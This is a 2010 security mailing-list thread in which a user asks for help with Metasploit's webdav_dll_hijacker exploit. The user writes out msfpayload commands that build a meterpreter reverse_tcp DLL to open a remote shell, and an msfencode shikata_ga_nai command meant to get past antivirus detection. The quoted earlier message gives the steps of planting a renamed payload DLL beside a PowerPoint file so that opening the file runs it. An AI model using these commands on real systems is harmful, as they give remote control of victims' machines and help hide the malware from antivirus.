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Re: DLL name for webdav_dll_hijacker exploit

From: anil saini <imanilsaini () gmail com>
Date: Wed, 1 Sep 2010 10:02:25 +0530

I have made  a dll using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST= LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working
and giving me meterpreter shell.

But this dll is caught by almost all anti-virus. I tried encoded this using
./msfencode but then this stoped working.
i used "*./msfpayload windows/meterpreter/reverse_tcp  LHOST=
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t dll >
/rpawinet.dll* "

i converted a encoded test.exe into a rpawinet.dll using following command
but that is also not working
*./msfpayload CMD=/test.exe D > /rpawinet.dll*

What wrong i m doing ?
please help.

-Anil Saini

On Mon, Aug 30, 2010 at 8:07 PM, HD Moore <hdm () metasploit com> wrote:

On 8/29/2010 11:26 PM, anil saini wrote:
I m testing *webdav_dll_hijacker i*n metasploit. My exploit is working
fine if i use it through net share.
But i m facing problems with archives and folders which includes
meterpreter payload DLL and file.

 My test steps are:-
     1. Generate meterpreter payload DLL using msfpayload commad.
     2. Rename DLL as DLL mentioned in various forums.(for example for
ppt 2007 i m using pptimpconv.dll, pp7x32.dll, rpawinet.dll)
     3. Put DLL and file.ppt  in a folder
     4. Open file.ppt from folder

Same methodology using vbscript and javascript with their associated DLL
types is working.

That is the correct way to do it, make sure no background process is
running for the affected product.



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